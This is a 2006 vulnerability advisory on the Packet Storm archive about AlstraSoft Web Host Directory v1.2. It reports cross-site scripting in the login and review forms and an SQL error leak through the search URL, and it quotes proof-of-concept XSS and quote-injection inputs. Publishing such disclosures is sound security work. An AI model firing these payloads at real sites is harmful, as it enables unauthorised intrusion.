exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WebHostDirectoryv1.2.txt

WebHostDirectoryv1.2.txt
Posted May 26, 2006
Authored by Luny

AlstraSoft Web Host Directory v1.2 suffers from XSS.

tags | advisory, web
SHA-256 | 76cb5fead72f07546ff6caac350ef52ff98aa9c400a8460f8a5eaa8319e6951d

WebHostDirectoryv1.2.txt

Change Mirror Download
AlstraSoft Web Host Directory v1.2

Homepage:
http://www.alstrasoft.com/

((It should be noted too that the demo for this script is on a different domain which also sells a WebHost Directory which looks to be the same product/company called HyperStop WebHost Directory 1.2. Both scripts seem to be the same))

Effected files:

Login form of script.
Search form of script.
Review form of script.
------------------------------------------

Exploits & Vulns:

Inserting html codes in the login form such as:

<DIV STYLE="width: expression(alert('XSS'));">

produces the following full path error:

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/username/public_html/

demo/webhost/include/login.php on line 6

---------------------------

URL Injection of the search url reveals SQL Query error:

Example:
http://www.example.com/demo/webhost/search/?uri='

Unknown column 'p.' in 'where clause'
[SELECT COUNT(*) FROM `hsl_plan` p LEFT JOIN `hsl_host` h ON p.hid=h.hid WHERE p.status=1 AND p.``='']

--------------------------

Input data isn't filtered in the write a review box. This in turn can cause a XSS. For proof of concept, just try putting

<DIV STYLE="width: expression(alert('XSS'));"> in as the review text and then login in as the admin and view your review. Reviews have an option to be auto approved too.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close